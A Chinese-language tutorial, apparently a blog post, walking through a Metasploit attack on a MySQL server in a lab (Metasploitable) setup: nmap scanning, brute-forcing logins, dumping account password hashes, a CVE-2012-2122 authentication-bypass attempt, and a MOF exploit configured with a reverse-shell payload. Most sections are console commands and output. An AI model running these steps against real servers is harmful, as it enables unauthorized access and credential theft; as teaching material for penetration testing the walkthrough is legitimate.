文章目录
前言
本文详细介绍了如何使用metasploit对mysql进行简单渗透测试
一、db_nmap扫描
使用外置和内置的都行,使用metasploit内置的nmap需要启动postgresql服务才能使用
1 常用nmap参数介绍
目标发现
-iL 添加扫描待ip列表文件
-iR 随机选择目标
不用指定目标ip,nmap对自动对全球的ip随机选择100个进行扫描
root@kali:~# nmap -iR 100 -p100
--exclude 排除扫描
当想要对某个ip地址段进行扫描,但是并不扫描其中特定的一些ip
root@kali:~# nmap 192.168.1.0/24 --exclude 192.168.1.1-100
从文件列表中排除不需要扫描的ip
主机发现
-sn ping扫描,不扫描端口
-Pn 完全扫描(穿透防火墙)
-PS/PA/PU/PY[portlist],协议扫描,TCP,SYN/ACK,UDP or SCTP ,基于上述协议去进行扫描端口
-PO[protocol list] 使用ip协议扫描
-n/-R
-n:不进行nds解析
-R:对其进行反向解析
--dns-servers 更换DNS服务器
<serv1[,serv2],...>: Specify custom DNS servers
更换系统默认DNS服务器,以得到不同的扫描结果
root@kali:~# nmap --dns-servers 8.8.8.8 www.sina.com
--traceroute 路由追踪,基本等同于traceroute命令
root@kali:~# nmap www.baidu.com --traceroute -p80
端口发现
-sS/sT/sA/sW/sM 基于TCP的端口发现
TCP SYN Connect() ACK Window Maimon scans
基于TCP的SYN 全连接 ACK 窗口 Maimon 扫描
-sU 基于UPD协议的扫描,但是UDP的扫描的准确率并不高
-sN/sF/sX 基于TCP的空/finish/xmas的扫描
--scanflags <flags>,其实以上对于TCP的扫描都是对tcpflags位的组合,所以我们自然是可以自定义组合的。
-sI 僵尸扫描,<zombie host[:probeport]>: Idle scan
-sY/sZ 基于SCTP协议(少用),SCTP INIT/COOKIE-ECHO scans
-b 基于FTP的中继扫描,<FTP relay host>: FTP bounce scan
指定端口和扫描菜单
-p 扫描特定类型端口/范围
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
--exclude-ports 排除不需扫描的端口范围
-F 快速扫描
Fast mode - Scan fewer ports than the default scan
-r 按顺序扫描
Scan ports consecutively - don't randomize
如果我们对1-1000个端口发起扫描,namp默认会在每次扫描中随机选择,-r会使namp按照从大到小的顺序进行。
只扫描常用端口的top n
服务/版本探测
-sV会使用nmap中的大量特征库去进行探测比对
--version-intensity
虽然-sV会nmap会调用自身大量的特征库资料去进行匹配,但是这样势必会增加比对的时间成本,所以我们可以探测阶段扫描的强度去最大限度的节省扫描的时间成本。
--version-trace
对扫描过程进行跟踪,显示扫描的具体过程
2 具体过程
┌──(root💀kali)-[~]
└─# service postgresql start
┌──(root💀kali)-[~]
└─# msfconsole
.;lxO0KXXXK0Oxl:.
,o0WMMMMMMMMMMMMMMMMMMKd,
'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
:KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit
=[ metasploit v6.0.46-dev ]
+ -- --=[ 2135 exploits - 1140 auxiliary - 365 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Open an interactive Ruby terminal with
irb
msf6 > db_nmap -sS -A 192.168.1.112
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-04 20:39 CST
[*] Nmap: Nmap scan report for 192.168.1.112
[*] Nmap: Host is up (0.00018s latency).
[*] Nmap: Not shown: 978 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
[*] Nmap: 512/tcp open exec netkit-rsh rexecd
[*] Nmap: 513/tcp open login?
[*] Nmap: 514/tcp open tcpwrapped
[*] Nmap: 1099/tcp open java-rmi GNU Classpath grmiregistry
[*] Nmap: 1524/tcp open bindshell Metasploitable root shell
[*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003)
[*] Nmap: 2121/tcp open ftp ProFTPD 1.3.1
[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
[*] Nmap: | mysql-info:
[*] Nmap: | Protocol: 10
[*] Nmap: | Version: 5.0.51a-3ubuntu5
[*] Nmap: | Thread ID: 3893
[*] Nmap: | Capabilities flags: 43564
[*] Nmap: | Some Capabilities: SupportsTransactions, Support41Auth, SupportsCompression, Speaks41ProtocolNew, LongColumnFlag, SwitchToSSLAfterHandshake, ConnectWithDatabase
[*] Nmap: | Status: Autocommit
[*] Nmap: |_ Salt: )@EwKP0?+WU'_-]o8g"l
msf6 > services -u
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.112 3306 tcp mysql open MySQL 5.0.51a-3ubuntu5
msf6 >
由于有些代码与本文无关并且占篇幅,所以就删了,具体视情况而定
二、查看版本
使用的是auxiliary/scanner/mysql/mysql_version
1 介绍功能
Name: MySQL Server Version Enumeration
Module: auxiliary/scanner/mysql/mysql_version
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
kris katterjohn <katterjohn@gmail.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 200 yes The number of concurrent threads (max one per host)
Description:
Enumerates the version of MySQL servers.
有三个参数,第一个是目标ip,二是目标端口,三是线程数,越多越快,但不能太多,会爆!
2 具体过程
msf6 > search mysql_version
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_version normal No MySQL Server Version Enumeration
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_version
msf6 > use 0
msf6 auxiliary(scanner/mysql/mysql_version) > options
Module options (auxiliary/scanner/mysql/mysql_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/mysql/mysql_version) > setg rhosts 192.168.1.112
rhosts => 192.168.1.112
msf6 auxiliary(scanner/mysql/mysql_version) > setg threads 200
threads => 200
msf6 auxiliary(scanner/mysql/mysql_version) > run
[+] 192.168.1.112:3306 - 192.168.1.112:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] 192.168.1.112:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
三、暴力破解密码
1 介绍功能
Name: MySQL Login Utility
Module: auxiliary/scanner/mysql/mysql_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Bernardo Damele A. G. <bernardo.damele@gmail.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE passwords.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 200 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Description:
This module simply queries the MySQL instance for a specific
user/pass (default is root with blank).
References:
https://nvd.nist.gov/vuln/detail/CVE-1999-0502
有几个参数很重要,有些之前就说过就不提了
一是password,数据库密码,一般都是破解密码,要是知道那还用这个?
二是pass_file是指密码字典,是一个txt文件
username和user_file同理
2 具体过程
msf6 auxiliary(scanner/mysql/mysql_version) > search mysql_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_login normal No MySQL Login Utility
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_version) > use 0
msf6 auxiliary(scanner/mysql/mysql_login) > options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 200 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/mysql/mysql_login) > setg pass_file passwords.txt
pass_file => passwords.txt
msf6 auxiliary(scanner/mysql/mysql_login) > exploit
这里暴力破解的过程我就不赘述了,太多了
四、收集信息
1 枚举数据库信息
①介绍功能
Name: MySQL Enumeration Module
Module: auxiliary/admin/mysql/mysql_enum
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Carlos Perez <carlos_perez@darkoperator.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD qwer no The password for the specified username
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
USERNAME root no The username to authenticate as
Description:
This module allows for simple enumeration of MySQL Database Server
provided proper credentials to connect remotely.
References:
https://cisecurity.org/benchmarks.html
这个模块主要功能是允许简单枚举MySQL数据库服务器,提供了正确的凭据以远程连接。
②具体过程
使用auxiliary/admin/mysql/mysql_enum
msf6 auxiliary(scanner/mysql/mysql_login) > search mysql_enum
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/mysql/mysql_enum normal No MySQL Enumeration Module
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/mysql/mysql_enum
msf6 auxiliary(scanner/mysql/mysql_login) > use 0
msf6 auxiliary(admin/mysql/mysql_enum) > options
Module options (auxiliary/admin/mysql/mysql_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
USERNAME no The username to authenticate as
msf6 auxiliary(admin/mysql/mysql_enum) > setg username root
username => root
msf6 auxiliary(admin/mysql/mysql_enum) > setg password qwer
password => qwer
msf6 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.1.112
[*] 192.168.1.112:3306 - Running MySQL Enumerator...
[*] 192.168.1.112:3306 - Enumerating Parameters
[*] 192.168.1.112:3306 - MySQL Version: 5.0.51a-3ubuntu5
[*] 192.168.1.112:3306 - Compiled for the following OS: debian-linux-gnu
[*] 192.168.1.112:3306 - Architecture: i486
[*] 192.168.1.112:3306 - Server Hostname: metasploitable
[*] 192.168.1.112:3306 - Data Directory: /var/lib/mysql/
[*] 192.168.1.112:3306 - Logging of queries and logins: OFF
[*] 192.168.1.112:3306 - Old Password Hashing Algorithm OFF
[*] 192.168.1.112:3306 - Loading of local files: ON
[*] 192.168.1.112:3306 - Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.168.1.112:3306 - Allow Use of symlinks for Database Files: YES
[*] 192.168.1.112:3306 - Allow Table Merge: YES
[*] 192.168.1.112:3306 - SSL Connections: Enabled
[*] 192.168.1.112:3306 - SSL CA Certificate: /etc/mysql/cacert.pem
[*] 192.168.1.112:3306 - SSL Key: /etc/mysql/server-key.pem
[*] 192.168.1.112:3306 - SSL Certificate: /etc/mysql/server-cert.pem
[*] 192.168.1.112:3306 - Enumerating Accounts:
[*] 192.168.1.112:3306 - List of Accounts with Password Hashes:
[+] 192.168.1.112:3306 - User: debian-sys-maint Host: Password Hash:
[+] 192.168.1.112:3306 - User: root Host: % Password Hash: *2491CA5000A9614AA28C39036702D965584486EC
[+] 192.168.1.112:3306 - User: guest Host: % Password Hash:
[*] 192.168.1.112:3306 - The following users have GRANT Privilege:
[*] 192.168.1.112:3306 - User: debian-sys-maint Host:
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_enum) >
2 导出密码hash
①介绍功能
Name: MYSQL Password Hashdump
Module: auxiliary/scanner/mysql/mysql_hashdump
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
theLightCosine <theLightCosine@metasploit.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD qwer no The password for the specified username
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 200 yes The number of concurrent threads (max one per host)
USERNAME root no The username to authenticate as
Description:
This module extracts the usernames and encrypted password hashes
from a MySQL server and stores them for later cracking.
这个函数可以导出在当前登陆用户权限下可以查看账户的密码hash,emm,,
②具体过程
msf6 auxiliary(admin/mysql/mysql_enum) > search mysql_hashdump
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_hashdump normal No MYSQL Password Hashdump
1 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/analyze/crack_databases
msf6 auxiliary(admin/mysql/mysql_enum) > sue 0
[-] Unknown command: sue.
msf6 auxiliary(admin/mysql/mysql_enum) > use 0
msf6 auxiliary(scanner/mysql/mysql_hashdump) > options
Module options (auxiliary/scanner/mysql/mysql_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD qwer no The password for the specified username
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 200 yes The number of concurrent threads (max one per host)
USERNAME root no The username to authenticate as
msf6 auxiliary(scanner/mysql/mysql_hashdump) > run
[+] 192.168.1.112:3306 - Saving HashString as Loot: debian-sys-maint:
[+] 192.168.1.112:3306 - Saving HashString as Loot: root:*2491CA5000A9614AA28C39036702D965584486EC
[+] 192.168.1.112:3306 - Saving HashString as Loot: guest:
[*] 192.168.1.112:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mysql/mysql_hashdump) >
五、mysql认证漏洞利用
1 介绍功能
Name: MySQL Authentication Bypass Password Dump
Module: auxiliary/scanner/mysql/mysql_authbypass_hashdump
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2012-06-09
Provided by:
theLightCosine <theLightCosine@metasploit.com>
jcran <jcran@metasploit.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 200 yes The number of concurrent threads (max one per host)
USERNAME root yes The username to authenticate as
Description:
This module exploits a password bypass vulnerability in MySQL in
order to extract the usernames and encrypted password hashes from a
MySQL server. These hashes are stored as loot for later cracking.
References:
https://nvd.nist.gov/vuln/detail/CVE-2012-2122
OSVDB (82804)
https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
这个模块利用的是CVE-2012-2122,在一次测试网易的过程中发现一枚,提交给NSRC了。
mysql任意用户密码概率登陆漏洞,按照公告说法大约256次就能够蒙对一次、All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
CVE ID: CVE-2012-2122
MariaDB是为MySQL提供偶然替代功能的数据库服务器。MySQL是开源数据库。
MariaDB 5.1.62, 5.2.12、5.3.6、5.5.23之前版本和MySQL
5.1.63、5.5.24、5.6.6之前版本在用户验证的处理上存在安全漏洞,可能导致攻击者无需知道正确口令就能登录到MySQL服务器。用户连接到MariaDB/MySQL后,应用会计算和比较令牌值,由于错误的转换,即使memcmp()返回非零值,也可能出现错误的比较,造成MySQL/MariaDB误认为密码是正确的,因为协议使用的是随机字符串,该Bug发生的几率为1/256。MySQL的版本是否受影响取决于程序的编译方式,很多版本(包括官方提供的二进制文件)并不受此漏洞的影响。
也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。
2 具体过程
msf6 auxiliary(scanner/mysql/mysql_hashdump) > search mysql_auth
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal No MySQL Authentication Bypass Password Dump
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf6 auxiliary(scanner/mysql/mysql_hashdump) > use 0
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > options
Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 200 yes The number of concurrent threads (max one per host)
USERNAME root yes The username to authenticate as
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run
[+] 192.168.1.112:3306 - 192.168.1.112:3306 The server allows logins, proceeding with bypass test
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 10% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 20% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 30% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 40% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 50% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 60% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 70% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 80% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 90% complete
[*] 192.168.1.112:3306 - 192.168.1.112:3306 Authentication bypass is 100% complete
[-] 192.168.1.112:3306 - 192.168.1.112:3306 Unable to bypass authentication, this target may not be vulnerable
[*] 192.168.1.112:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
六、Mof提权
1 介绍功能
Name: Oracle MySQL for Microsoft Windows MOF Execution
Module: exploit/windows/mysql/mysql_mof
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2012-12-01
Provided by:
kingcope
sinn3r <sinn3r@metasploit.com>
Available targets:
Id Name
-- ----
0 MySQL on Windows prior to Vista
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD qwer yes The password to authenticate with
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
USERNAME root yes The username to authenticate as
Payload information:
Description:
This module takes advantage of a file privilege misconfiguration
problem specifically against Windows MySQL servers (due to the use
of a .mof file). This may result in arbitrary code execution under
the context of SYSTEM. This module requires a valid MySQL account on
the target machine.
此模块利用文件权限配置错误专门针对Windows MySQL服务器的问题(由于使用.mof文件)。
这可能导致在以下情况下执行任意代码:系统的上下文。此模块需要上的有效MySQL帐户。
目标机器。
References:
https://nvd.nist.gov/vuln/detail/CVE-2012-5613
OSVDB (88118)
https://www.exploit-db.com/exploits/23083
https://seclists.org/fulldisclosure/2012/Dec/13
2 具体过程
sf6 exploit(multi/mysql/mysql_udf_payload) > search mysql_
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_writable_dirs normal No MYSQL Directory Write Test
1 auxiliary/scanner/mysql/mysql_file_enum normal No MYSQL File/Directory Enumerator
2 auxiliary/scanner/mysql/mysql_hashdump normal No MYSQL Password Hashdump
3 auxiliary/scanner/mysql/mysql_schemadump normal No MYSQL Schema Dump
4 auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal No MySQL Authentication Bypass Password Dump
5 auxiliary/admin/mysql/mysql_enum normal No MySQL Enumeration Module
6 auxiliary/scanner/mysql/mysql_login normal No MySQL Login Utility
7 auxiliary/admin/mysql/mysql_sql normal No MySQL SQL Generic Query
8 auxiliary/scanner/mysql/mysql_version normal No MySQL Server Version Enumeration
9 exploit/linux/mysql/mysql_yassl_getname 2010-01-25 good No MySQL yaSSL CertDecoder::GetName Buffer Overflow
10 exploit/linux/mysql/mysql_yassl_hello 2008-01-04 good No MySQL yaSSL SSL Hello Message Buffer Overflow
11 exploit/windows/mysql/mysql_yassl_hello 2008-01-04 average No MySQL yaSSL SSL Hello Message Buffer Overflow
12 exploit/multi/mysql/mysql_udf_payload 2009-01-16 excellent No Oracle MySQL UDF Payload Execution
13 exploit/windows/mysql/mysql_start_up 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows FILE Privilege Abuse
14 exploit/windows/mysql/mysql_mof 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows MOF Execution
15 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
16 auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
Interact with a module by name or index. For example info 16, use 16 or use auxiliary/admin/http/rails_devise_pass_reset
msf6 exploit(multi/mysql/mysql_udf_payload) > use 14
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/mysql/mysql_mof) > options
Module options (exploit/windows/mysql/mysql_mof):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD qwer yes The password to authenticate with
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
USERNAME root yes The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 MySQL on Windows prior to Vista
但是因为本攻击载荷不支持linux系统,所以没有攻击成功,
总结
本文详细介绍了使用metasploit对mysql进行渗透测试的方法,仅供学习。